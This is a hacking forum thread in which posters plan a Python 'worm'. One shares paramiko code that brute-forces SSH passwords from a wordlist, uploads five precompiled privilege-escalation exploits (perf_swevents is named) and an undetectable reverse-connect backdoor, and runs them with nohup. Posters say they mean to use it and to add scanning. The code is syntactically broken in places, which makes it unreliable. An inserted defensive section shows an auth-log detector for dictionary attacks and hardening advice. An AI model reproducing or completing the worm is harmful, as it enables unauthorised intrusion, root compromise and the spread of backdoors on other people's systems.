Python worm
I don’t know, I haven’t tried it yet, and the guy doesn’t give away the whole code. When I have some time, I’ll try to figure out what’s missing.
jeez that's fucking easy, holy shit bro, for sure i am going to use this. all he is doing is cracking the ssh server like hydra etc, then once he has a valid username/password he uploads the exploit and executes, then exploits. damn, we need to work on this. pray tell, how do you do the base 64 encoding of an exe into python lol. you can precompile an exploit and have it stored inside the program and transferred via that method
i bake therefore im fried!!
Just because I am paranoid doesn’t mean they’re not after me…
um i have this worked out a lil. what i have done is i plan to use perf_swevents exploit to upload to the target server after i break into ssh, then i may do a few other things. i'm going to try this on kali in about an hour. when i'm done i will screen record it if i get it to compile right
i bake therefore im fried!!
ok now i have never messed with python before but here is my attempt, and the backdoor is a precompiled linux binary
```python
#!/usr/bin/env python
“”“
Author: Vivek Ramachandran
Website: http://SecurityTube.net
Online Infosec Training: http://SecurityTube-Training.com
and a stab at it from oxide
”“”
import paramiko
import sys
// input variables via command line
def AttackSSH(ipAddress, dictionaryFile) :
print “[+] Attacking Host : %s ” %ipAddress
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
for line in open(dictionaryFile, “r”).readlines() :
[username, password] = line.strip().split()
try :
print “[+] Trying to break in with username: %s password: %s ” % (username, password)
ssh.connect(ipAddress, username=username, password=password)
except paramiko.AuthenticationException:
print “[-] Failed please keep trying or use a bigger dictionary! …”
continue
print “[+] Success … username: %s and passoword %s is VALID! ” % (username, password)
//upload_and_execute( ipAddress,username,password)
break
def UploadFileAndExecute(ipAddress,username,password) :
#exploit path
path = “/tmp/oxide/pythonworm/exploit/”
#very small and fud compiled linux binary and windows backdoor reverse connect
backdoor= “/tmp/oxide/pythonworm/exploit/backdoor”
#5 exploits will be precompiled on attack server to send over ssh upon breakin
exploit1 = “ /home/oxide/pythonworm/exploit/exploit_1”
exploit2 = “ /home/oxide/pythonworm/exploit/exploit_2”
exploit3 = “ /home/oxide/pythonworm/exploit/exploit_3”
exploit4 = “ /home/oxide/pythonworm/exploit/exploit_4”
exploit5 = “ /home/oxide/pythonworm/exploit/exploit_5”
#sftp ssh client for uploading
sftpClient = sftp.Server(ipAddress,username,password)
#putting all 5 exploit on target server
sftpClient.upload(exploit1,+path)
sftpClient.upload(exploit2,+path)
sftpClient.upload(exploit3,+path)
sftpClient.upload(exploit4,+path)
sftpClient.upload(exploit5,+path)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ipAddress, username, password)
we need to create the remote directory
ssh.exec_command(“mkdir ”+path)
ssh.exec_command(“chmod a+x” +path)
#now run all 5 and give full rights
ssh.exec_command(“chmod a+x” +path +exploit1)
ssh.exec_command(“nohup” +path +exploit1+ “ &”)
ssh.exec_command(“chmod a+x” +path +exploit2)
ssh.exec_command(“nohup” +path +exploit2+ “ &”)
ssh.exec_command(“chmod a+x” +path +exploit3)
ssh.exec_command(“nohup” +path +exploit3+ “ &”)
ssh.exec_command(“chmod a+x” +path +exploit4)
ssh.exec_command(“nohup” +path +exploit4+ “ &”)
ssh.exec_command(“chmod a+x” +path +exploit5)
ssh.exec_command(“nohup” +path +exploit5+ “ &”)
close our file sender
sftpClient.close()
ssh.close()
now if all worked we should have an exploited machine and backconnect trojan installed wit hroot rights
if name == “main” :
AttackSSH(sys.argv[1], sys.argv[2])
```
now in my head if we precompile the backdoor and exploits and have a proper wordlist this should work. now we have to figure out how he scans for ssh lol, then we should be 75% to what he did
i bake therefore im fried!!
if this looks like i have syntax right etc let me know and i'll get the rest to start working via precompiled exploits etc and i'll set up my own ssh server etc. let me know what you guys think
i bake therefore im fried!!
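A defender-side view of the behaviour discussed in this thread (a run of username/password guesses over SSH that stops at the first valid pair), as an added example that is not part of the original posts: it scans sshd auth-log lines for a password login that follows a burst of failures from the same address. The log lines, thresholds and function name are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of OpenSSH sshd auth-log lines (not from the thread).
SAMPLE_LOG = """\
Mar  3 10:00:01 host sshd[101]: Failed password for root from 203.0.113.5 port 40001 ssh2
Mar  3 10:00:02 host sshd[102]: Failed password for invalid user admin from 203.0.113.5 port 40002 ssh2
Mar  3 10:00:03 host sshd[103]: Failed password for invalid user test from 203.0.113.5 port 40003 ssh2
Mar  3 10:00:04 host sshd[104]: Failed password for oracle from 203.0.113.5 port 40004 ssh2
Mar  3 10:00:05 host sshd[105]: Accepted password for deploy from 203.0.113.5 port 40005 ssh2
Mar  3 10:05:00 host sshd[110]: Failed password for alice from 198.51.100.7 port 50000 ssh2
Mar  3 10:05:09 host sshd[111]: Accepted password for alice from 198.51.100.7 port 50001 ssh2
Mar  3 10:06:00 host sshd[112]: Accepted publickey for carol from 192.0.2.10 port 50100 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def find_guessed_logins(log_text, min_failures=3, min_users=2):
    """Return (ip, user, failures) for password logins that follow a dictionary run.

    An IP is flagged when it accumulated at least min_failures failed
    passwords across at least min_users distinct usernames before a success.
    """
    failures = defaultdict(int)   # ip -> failed password count so far
    users = defaultdict(set)      # ip -> usernames tried so far
    alerts = []
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue  # publickey logins and unrelated lines are ignored
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failures[ip] += 1
            users[ip].add(user)
        else:
            if failures[ip] >= min_failures and len(users[ip]) >= min_users:
                alerts.append((ip, user, failures[ip]))
            failures[ip] = 0      # reset so later logins are judged afresh
            users[ip].clear()
    return alerts

if __name__ == "__main__":
    for ip, user, n in find_guessed_logins(SAMPLE_LOG):
        print(f"ALERT {ip}: password login as {user!r} after {n} failures")
```

Setting `PasswordAuthentication no` in `sshd_config` and using keys removes the guessable credential this pattern depends on; the log check then serves as a backstop for hosts that still allow passwords.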
1 - Having not read it, just gave it a look, we need to indent that code.
2 - My big trouble with this code is that I don’t have paramiko, I’m trying to get it
of course it uses paramiko, all we have to do is include it and compile it on the attacking end
and embed what we need in these xploits etc. in case i got this right or was close i didn't want to release because i want to use perf_swevents which is recent
i bake therefore im fried!!